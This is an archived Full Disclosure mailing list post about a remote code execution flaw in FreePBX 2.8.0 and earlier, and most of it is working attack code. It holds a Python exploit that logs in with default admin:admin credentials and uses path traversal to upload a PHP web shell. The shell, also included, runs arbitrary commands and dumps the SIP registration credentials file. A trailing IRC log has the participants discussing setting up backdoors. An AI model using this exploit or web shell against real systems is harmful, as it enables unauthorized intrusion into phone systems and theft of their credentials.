Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution
From: foo net <foonet () hotmail com>
Date: Mon, 26 Mar 2012 21:10:52 +0300



                           ,-------.                 /             
                         ,'         `.           ,--'              
                       ,'             `.      ,-;--        _.-     
                 pow! /                 \ ---;-'  _.=.---''        
    +-------------+  ;    X        X     ---=-----'' _.-------     
    |    -----    |--|                   \-----=---:i-             
    +XX|'i:''''''''  :                   ;`--._ ''---':----        
    /X+-)             \   \         /   /      ''--._  `-          
   .XXX|)              `.  `.     ,'  ,'             ''---.        
     X\/)                `.  '---'  ,'                     `-      
       \                   `---+---'        
        \                      |            "Witness my perfection !"
         \.                    |           
           `-------------------+            
  


FreePBX recordings interface allows remote code executionPublished: 2010-09-23Version: 1.0Vendor: FreePBX 
(http://www.freepbx.org/)Product: FreePBX and VOIP solutions (AsteriskNOW, TrixBox, etc) using itVersion(s) affected: 
2.8.0 and below

/* zZzZz */ <?php  if (isset($_FILES['ivrfile']['tmp_name']) &&  is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {    
if (empty($usersnum)) {      $dest = "unnumbered-";    } else {      $dest = "{$usersnum}-";    }    $suffix = 
substr(strrchr($_FILES['ivrfile']['name'], "."), 1);    $destfilename = 
$recordings_save_path.$dest."ivrrecording.".$suffix;    move_uploaded_file($_FILES['ivrfile']['tmp_name'], 
$destfilename);    echo "<h6>"._("Successfully uploaded")."      ".$_FILES['ivrfile']['name']."</h6>";    $rname = 
rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');  } ?> /* zZzZz */


/**/god.py/**/
#!/usr/bin/pythonimport os, socket, sys, urllib2, re, MultipartPostHandler
def exploit(host):    auth_handler = urllib2.HTTPBasicAuthHandler()    auth_handler.add_password('FreePBX 
Administration', host, 'admin', 'admin')    opener = urllib2.build_opener(auth_handler, 
MultipartPostHandler.MultipartPostHandler)    url = 'https://'+host+'/admin/config.php&apos;    header = {'Referer': 
"https://"+host+"/admin/config.php?type=setup&display=recordings"}    post_data = {}    post_data['display'] = 
'recordings'    post_data['action'] = 'recordings_start'    post_data['usersnum'] = 
'../../../../../var/www/html/admin/Z'    post_data['ivrfile'] = open('x.php', "rb")    urllib2.install_opener(opener)   
 request = urllib2.Request(url, post_data, header)    socket.setdefaulttimeout(4)    try:        data = 
urllib2.urlopen('https://'+host+'/admin/config.php&apos;).read()        authobj = re.compile('(?:Logged\s)?')        
matchobj = authobj.match(data)        if matchobj:            print 'https://'+host+'/admin/config.php admin:admin'     
       urllib2.urlopen(request)            os.system("echo 'https://"+host+"/admin/Z-ivrrecording.php?sip=info'";);      
      sys.exit()        else:            sys.exit()    except:        sys.exit()
def verify(host):    socket.setdefaulttimeout(4)    theurl = 'https://'+host+'/admin/config.php&apos;    req = 
urllib2.Request(theurl)    try:        handle = urllib2.urlopen(req)    except IOError, e:        if hasattr(e, 
'code'):            if e.code != 401:                sys.exit()            else:                header = 
e.headers['www-authenticate']                authobj = re.compile('(?:FreePBX\s)?')                matchobj = 
authobj.match(header)                if matchobj:                    exploit(host)                else:                 
   sys.exit()

def checkit(host):    auth_handler = urllib2.HTTPBasicAuthHandler()    auth_handler.add_password('FreePBX 
Administration', host, 'admin', 'admin')    opener = urllib2.build_opener(auth_handler)    
urllib2.install_opener(opener)    socket.setdefaulttimeout(4)    try:        data = 
urllib2.urlopen('https://'+host+'/admin/config.php&apos;).read()        authobj = re.compile('(?:Logged\s)?')        
matchobj = authobj.match(data)        if matchobj:            print 'https://'+host+'/admin/config.php admin:admin'     
       exploit(host)        else:            sys.exit()    except:        sys.exit()
if len(sys.argv) < 2:        print '[!] '+sys.argv[0]+' IP'        sys.exit()
host = sys.argv[1]verify(host)


/**/x.php/**/<body bgcolor="black"><font color="lime"><pre><?phperror_reporting(0);set_time_limit(0);echo 
base64_decode("Wm1FdSB2MC4x")."\n";if ($_GET["php"] == "info") { $cmd = $_GET["ip"]; @system($cmd); }if ($_GET["sip"] 
== "info") {  @system("cat /etc/asterisk/sip_registrations.conf"); }?></pre></font>




/**/MultipartPostHandler.py/**/

#!/usr/bin/python
"""ZmEu v0.1"""
import urllibimport urllib2import mimetools, mimetypesimport os, stat
class Callable:    def __init__(self, anycallable):        self.__call__ = anycallable
doseq = 1
class MultipartPostHandler(urllib2.BaseHandler):    handler_order = urllib2.HTTPHandler.handler_order - 10
    def http_request(self, request):        data = request.get_data()        if data is not None and type(data) != str: 
           v_files = []            v_vars = []            try:                 for(key, value) in data.items():         
            if type(value) == file:                         v_files.append((key, value))                     else:      
                   v_vars.append((key, value))            except TypeError:                systype, value, traceback = 
sys.exc_info()                raise TypeError, "not a valid non-string sequence or mapping object", traceback
            if len(v_files) == 0:                data = urllib.urlencode(v_vars, doseq)            else:                
boundary, data = self.multipart_encode(v_vars, v_files)                contenttype = 'multipart/form-data; boundary=%s' 
% boundary                if(request.has_header('Content-Type')                   and 
request.get_header('Content-Type').find('multipart/form-data') != 0):                    print "Replacing %s with %s" % 
(request.get_header('content-type'), 'multipart/form-data')                
request.add_unredirected_header('Content-Type', contenttype)
            request.add_data(data)        return request
    def multipart_encode(vars, files, boundary = None, buffer = None):        if boundary is None:            boundary 
= mimetools.choose_boundary()        if buffer is None:            buffer = ''        for(key, value) in vars:          
  buffer += '--%s\r\n' % boundary            buffer += 'Content-Disposition: form-data; name="%s"' % key            
buffer += '\r\n\r\n' + value + '\r\n'        for(key, fd) in files:            file_size = 
os.fstat(fd.fileno())[stat.ST_SIZE]            filename = fd.name.split('/')[-1]            contenttype = 
mimetypes.guess_type(filename)[0] or 'application/octet-stream'            buffer += '--%s\r\n' % boundary            
buffer += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)            buffer += 
'User-Agent: ZmEu/pbx\r\n'            buffer += 'Content-Type: %s\r\n' % contenttype            # buffer += 
'Content-Length: %s\r\n' % file_size            fd.seek(0)            buffer += '\r\n' + fd.read() + '\r\n'        
buffer += '--%s--\r\n\r\n' % boundary        return boundary, buffer    multipart_encode = Callable(multipart_encode)
    https_request = http_request
def main():    import tempfile, sys
    validatorURL = "http://validator.w3.org/check";    opener = urllib2.build_opener(MultipartPostHandler)
    def validateFile(url):        temp = tempfile.mkstemp(suffix=".html")        os.write(temp[0], 
opener.open(url).read())        params = { "ss" : "0",            # show source                   "doctype" : "Inline", 
                  "uploaded_file" : open(temp[1], "rb") }        print opener.open(validatorURL, params).read()        
os.remove(temp[1])
    if len(sys.argv[1:]) > 0:        for arg in sys.argv[1:]:            validateFile(arg)    else:        
validateFile("http://www.google.com";)
if __name__=="__main__":    main()

/**//**/

/*
[08:20pm] <@zeu> Uptime: 1 week 2 days 3 hours 41 minutes 21 seconds[08:29pm] * Quits: @eins (eins5 () sixnine us) 
(Read error: Operation timed out)[08:33pm] <@d3mon> kay me bbs gonna setup some backd00r and then release it[08:33pm] 
<@d3mon> y0 zmeu[08:33pm] <@d3mon> keep in touch[08:34pm] <@d3mon> i did not forgot[08:34pm] <@d3mon> what you 
need[08:34pm] <@d3mon> in case you dont have that vuln  yet[08:34pm] <@d3mon> i'll provide tonight[08:35pm] <@d3mon> 
also becarefull with that sickhead[08:35pm] <@d3mon> Kryptik[08:35pm] * Joins: _eins (eins5 () sixnine us)[08:35pm] 
<@d3mon> [00:28] <@d3mon> [15:49] <xd> coz, i know he mustve rooted one of my ircd boxes.[08:35pm] <@d3mon> [00:28] 
<@d3mon> [15:49] <xd> this is why im sick of using linux for them[08:35pm] <@d3mon> [00:28] <@d3mon> [15:50] <xd> 
theyre just, a pain in arse.[08:35pm] <@d3mon> [00:28] <@d3mon> [15:50] <xd> i loose code to dickheads[08:35pm] 
<@d3mon> [00:28] <@d3mon> [15:50] <xd> and, you would think he would give me some codes[08:35pm] <@d3mon> [00:28] 
<@d3mon> [15:50] <xd> but he always asks[08:35pm] <@d3mon> [00:28] <@d3mon> [15:50] <xd> i always help him[08:35pm] 
<@d3mon> [00:28] <@d3mon> [15:50] <xd> and, he never once gives me shit.[08:35pm] <@d3mon> [00:28] <@d3mon> [15:50] 
<xd> nothing[08:35pm] <@d3mon> [00:28] <@d3mon> [15:50] <xd> i dont even know why hes in my channel[08:35pm] <@d3mon> 
[00:28] <@d3mon> [15:50] <xd> hes a fucking leech[08:36pm] <@d3mon> hahaha j00 r  a fuck1ng dickhead[08:36pm] <@d3mon> 
mwhaahhahahha[08:36pm] <@d3mon> also a leech[08:36pm] <@d3mon> be carefull man[08:36pm] <@zeu> ce ma[08:37pm] <@d3mon> 
asta zice [08:37pm] <@d3mon> xd--[08:37pm] <@d3mon> despre tine[08:37pm] <@d3mon> acum ceva vreme[08:37pm] <@zeu> da, 
ca nui dau codurile mele[08:37pm] <@zeu> si ?[08:37pm] <@zeu> [08:36pm] <@d3mon> be carefull man[08:37pm] <@d3mon> f 
bine faci[08:37pm] <@d3mon> :))[08:38pm] <@d3mon> da-i la muie[08:38pm] <@d3mon> da-l in sloboz[08:38pm] <@zeu> nam 
nevoie de ajutoru nimanui ma :)[08:38pm] <@d3mon> ca un lake afumat[08:38pm] <@d3mon> ca e*[08:38pm] <@d3mon> e vai 
pula lui[08:38pm] <@d3mon> crede-ma[08:38pm] <@d3mon> io m-am convins...Thank's xd, do you need codes? get roles!"fuck 
friendz" -- sGod....*/                                     
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution foo net (Mar 27)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]